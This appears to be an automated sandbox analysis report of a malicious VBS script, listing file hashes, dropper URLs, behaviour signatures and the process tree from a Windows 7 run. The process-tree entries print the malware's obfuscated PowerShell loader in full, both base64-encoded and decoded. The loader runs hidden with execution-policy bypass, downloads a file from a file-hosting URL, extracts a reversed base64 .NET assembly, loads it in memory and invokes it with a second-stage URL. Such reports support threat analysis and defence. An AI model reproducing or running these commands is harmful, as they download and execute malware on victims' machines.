Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12-11-2024 03:08

General

  • Target

    f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs

  • Size

    11KB

  • MD5

    f5678ceb6c0d259337b4dab43f009e97

  • SHA1

    71bc74501d1b126adb0bed8d7e4c3e182cd5bbbe

  • SHA256

    f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348

  • SHA512

    463b6cca15009a574a454637f3d5555c3ebde0117f65c12d0803e9ca3dac0e534b157ef473deaf703b60db396bde0a384b9471f4fccaed33995217353619a739

  • SSDEEP

    192:mXThtJfTvuOg25CfSkYiGh6yR4W8L8tnQ2+mi3F8w/RHXS:8FOGqF/JHXS

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XqrJnUsDhYijtro.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0s2aW1hZ2VVcmwgPSA5U2NodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9mJysnaWxla2V5PTJBYV9iV28nKyc5UmV1NDUnKyd0JysnN0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVEknKydDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIDlTYztPSzZ3ZWJDJysnbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O09LNmltYWdlQnl0ZXMgPSBPSzZ3ZWJDJysnbGllbnQuRG93bmxvJysnYWREYXRhKE9LNmltYWdlVXJsKTtPSzZpbWFnZVRleHQgPSBbU3lzdGVtLicrJ1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhPSzZpbWFnJysnZUJ5dGVzKTtPSzZzdGEnKydydEZsYWcgPSA5U2M8PEJBU0U2NF9TVEFSVD4+OVNjO09LNmVuZEZsYWcgPSA5U2M8PEJBU0U2NF9FTkQ+PjlTYztPSzZzdGFydEluZGV4ID0gT0s2aW1hZ2VUZXh0LkluZGV4T2YoT0s2c3RhcnRGbCcrJ2FnKScrJztPSzZlbmRJbmRleCA9IE9LNmltYScrJ2dlVGV4dC5JbicrJ2RleE9mKE9LNmVuZEZsYWcpO09LNnN0YScrJ3J0SW5kZXggLWdlIDAgLWFuZCBPSzZlbmRJbmRleCAtZ3QgT0s2c3RhcnRJbmRleDtPSzZzdGFydEluZGV4ICsnKyc9IE9LNnN0YXJ0RmxhZy5MZW5ndGg7T0s2YmFzZTY0TGVuZ3RoID0gT0s2ZW5kSW5kZXggLSBPSzZzdGFydEluZGV4O09LNmJhc2U2NENvbW1hbmQgPSBPSzZpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ09LNnN0JysnYXJ0SW5kZXgsIE9LNmJhc2U2NExlbmd0aCk7T0s2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoT0s2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHRyYiBGb3JFYWNoLU9iamVjdCB7IE9LNl8gfSlbLTEuLi0oJysnT0s2YmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtPSzZjb21tYW4nKydkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjonKydGcm9tQmFzZTY0U3RyJysnaScrJ25nKE9LNmJhcycrJ2U2NCcrJ1JldmVyJysnc2VkKTtPSzZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoT0s2Y29tbWFuZEJ5dGVzKTtPSzZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDlTJysnY1ZBSTlTYyk7T0s2dmFpTWV0aG9kLkludm9rZShPSzZudWxsLCcrJyBAKDlTY3QnKyd4dC5MU1NXUy9rbG8vdWUuaHN1cHdzcmVsbG9yLnN1cC8vOnB0dGg5U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTYycrJ2Rlc2F0aXZhZG85U2MsIDlTJysnY2Rlc2F0aXZhJysnZCcrJ285U2MsIDlTYzE5U2MsIDlTY09uZURyaXZlU2V0dXA5U2MsIDlTY2Rlc2F0aXZhZG85U2MsIDlTY2Rlc2F0aXZhJysnZG85U2MsOVNjZGVzYXRpdmFkbzlTYyw5U2NkZXNhdGl2YWRvOVNjLDlTY2QnKydlc2F0aXZhZG85U2MsOVNjMTlTYyw5U2NkZXNhJysndGl2YWRvOVNjKSk7JykgIC1yZXBsQUNlKFtDSGFyXTExNitbQ0hhcl0xMTQrW0NIYXJdOTgpLFtDSGFyXTEyNC1jcmVwbGFDRSAnT0s2JyxbQ0hhcl0zNiAgLXJlcGxBQ2UgICc5U2MnLFtDSGFyXTM5KSB8ICYgKChHdiAnKk1kUionKS5OYW1FWzMsMTEsMl0tam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:612
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OK6imageUrl = 9Schttps://1017.filemail.com/api/file/get?f'+'ilekey=2Aa_bWo'+'9Reu45'+'t'+'7BU1kVgsd9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f 9Sc;OK6webC'+'lient = New'+'-Object System.Net.WebClient;OK6imageBytes = OK6webC'+'lient.Downlo'+'adData(OK6imageUrl);OK6imageText = [System.'+'Text.Encoding]::UTF8.GetString(OK6imag'+'eBytes);OK6sta'+'rtFlag = 9Sc<<BASE64_START>>9Sc;OK6endFlag = 9Sc<<BASE64_END>>9Sc;OK6startIndex = OK6imageText.IndexOf(OK6startFl'+'ag)'+';OK6endIndex = OK6ima'+'geText.In'+'dexOf(OK6endFlag);OK6sta'+'rtIndex -ge 0 -and OK6endIndex -gt OK6startIndex;OK6startIndex +'+'= OK6startFlag.Length;OK6base64Length = OK6endIndex - OK6startIndex;OK6base64Command = OK6imageText.Substring('+'OK6st'+'artIndex, OK6base64Length);OK6base64Reversed = -join (OK6base64Command.ToCharArray() trb ForEach-Object { OK6_ })[-1..-('+'OK6base64Co'+'mmand.Length)];OK6comman'+'dBytes = [System.Convert]::'+'FromBase64Str'+'i'+'ng(OK6bas'+'e64'+'Rever'+'sed);OK6loadedAssembly = [System.Reflection.Assembly'+']::Load(OK6commandBytes);OK6vaiMethod = [dnlib.IO.Home].GetMethod(9S'+'cVAI9Sc);OK6vaiMethod.Invoke(OK6null,'+' @(9Sct'+'xt.LSSWS/klo/ue.hsupwsrellor.sup//:ptth9Sc, 9Scdesativado9Sc, 9Scdesativado9Sc, 9Sc'+'desativado9Sc, 9S'+'cdesativa'+'d'+'o9Sc, 9Sc19Sc, 9ScOneDriveSetup9Sc, 9Scdesativado9Sc, 9Scdesativa'+'do9Sc,9Scdesativado9Sc,9Scdesativado9Sc,9Scd'+'esativado9Sc,9Sc19Sc,9Scdesa'+'tivado9Sc));') -replACe([CHar]116+[CHar]114+[CHar]98),[CHar]124-creplaCE 'OK6',[CHar]36 -replACe '9Sc',[CHar]39) | & ((Gv '*MdR*').NamE[3,11,2]-joiN'')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\XqrJnUsDhYijtro.vbs

    Filesize

    1KB

    MD5

    03e4e4d0259b3af7b37e2802812d9128

    SHA1

    fcef4018ec7206fb296b79e8035bb02457e39872

    SHA256

    26524695f59b3f155be3c94504537f36c5de23bc2226e5819b7919023dd5c183

    SHA512

    dbdaa2707f6e19442a7d55f119487b418f17a040462b11fc88653e130709c1127e2d0d1923dde3258546ff07b18c1d3c5cdbc2a7ff40f342d3689a618159e1a6

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    0b9439986ee468c1b245ae3b109fc8f8

    SHA1

    99e47c9f6bbfa40e0a6a928ca7288a078b0871a4

    SHA256

    33acb07b5b81eb2d21ed2f0b5b261bc42dd2bf3fd8fe5976fd4ee9a9420489b9

    SHA512

    20ffb5a73266da8a49e4de08034659e37ef8eed6c7d648476564e1291c1be9a5ddc81774227e78515d3bf5ce46cc648fbbb0372496dae365ad4595c29b583892

  • memory/612-8-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

    Filesize

    2.9MB

  • memory/612-9-0x00000000028A0000-0x00000000028A8000-memory.dmp

    Filesize

    32KB